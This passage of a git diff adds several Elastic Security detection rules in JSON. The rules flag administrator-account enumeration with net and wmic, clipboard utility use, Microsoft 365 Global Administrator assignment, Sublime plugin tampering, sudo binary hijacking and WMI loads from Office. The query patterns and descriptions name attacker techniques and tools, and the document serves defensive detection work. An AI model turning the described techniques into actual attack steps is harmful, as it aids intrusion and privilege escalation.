"https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "871ea072-1b71-4def-b016-6278b505138d_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json new file mode 100644 index 00000000000..aedb3acbcf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Administrator Accounts", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups in the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n (process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and not process.parent.name : \"net.exe\")\n ) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"*admin*\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\")\n and not process.args : (\"/add\", \"/delete\")\n ) or\n (\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\")\n )\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "871ea072-1b71-4def-b016-6278b505138d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "871ea072-1b71-4def-b016-6278b505138d_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json new file mode 100644 index 00000000000..3b577fac73d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Suspicious Clipboard Activity Detected", + "new_terms_fields": [ + "host.id", + "process.group_leader.executable" + ], + "query": "event.category:process and host.os.type:\"linux\" and\nevent.type:\"start\" and event.action:(\"exec\" or \"exec_event\" or \"executed\" or \"process_started\") and\nprocess.name:(\"xclip\" or \"xsel\" or \"wl-clipboard\" or \"clipman\" or \"copyq\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json new file mode 100644 index 00000000000..cec0b69667c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json new file mode 100644 index 00000000000..abcba6f1078 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json new file mode 100644 index 00000000000..ef78b06e611 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json new file mode 100644 index 00000000000..193d18c4820 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may create or modify the Sublime application plugins or scripts to execute a malicious payload each time the Sublime application is started.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Sublime Plugin or Application Script Modification", + "query": "file where host.os.type == \"macos\" and event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path :\n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\",\n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable :\n (\n \"/Applications/Sublime Text*.app/Contents/*\",\n \"/usr/local/Cellar/git/*/bin/git\",\n \"/Library/Developer/CommandLineTools/usr/bin/git\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\"\n )\n", + "references": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "88817a33-60d3-411f-ba79-7c905d865b2a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json new file mode 100644 index 00000000000..467d70894cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Sudo Hijacking Detected", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.type:(\"creation\" or \"file_create_event\") and\nfile.path:(\"/usr/bin/sudo\" or \"/bin/sudo\") and not process.name:(docker or dockerd or pacman)\n", + "references": [ + "https://eapolsniper.github.io/2020/08/17/Sudo-Hijacking/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "88fdcb8c-60e5-46ee-9206-2663adf1b1ce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json new file mode 100644 index 00000000000..674e0027760 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMI Image Load from MS Office", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json new file mode 100644 index 00000000000..efe4d7b786f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMI Image Load from MS Office", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 